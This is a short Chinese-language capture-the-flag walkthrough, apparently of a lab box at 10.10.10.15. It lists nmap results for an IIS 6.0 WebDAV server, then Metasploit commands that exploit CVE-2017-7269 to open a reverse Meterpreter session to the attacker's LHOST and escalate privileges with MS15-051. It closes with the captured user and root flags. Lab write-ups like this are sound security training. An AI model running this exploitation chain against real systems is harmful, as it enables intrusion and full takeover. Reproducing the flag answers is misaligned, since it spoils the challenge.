信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.15 | TCP:80 |
$ nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn
bash
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| WebDAV type: Unknown
| Server Date: Thu, 22 Aug 2024 07:28:25 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsIIS 6.0 & CVE-2017-7269 & BOF
$ msfconsole
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.16.24
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
meterpreter > bg
权限提升 & MS15-051
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
但是你如果尝试执行权限提升会出现错误
为了确保稳定,进程迁移到davcdata.exe
meterpreter > migrate 2732
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.16.24
msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
msf6 exploit(windows/local/ms15_051_client_copy_image) > run
User.txt
700c5dc163014e22b3e408f8703f67d1
Root.txt
aa4beed1c0584445ab463a6747bd06e9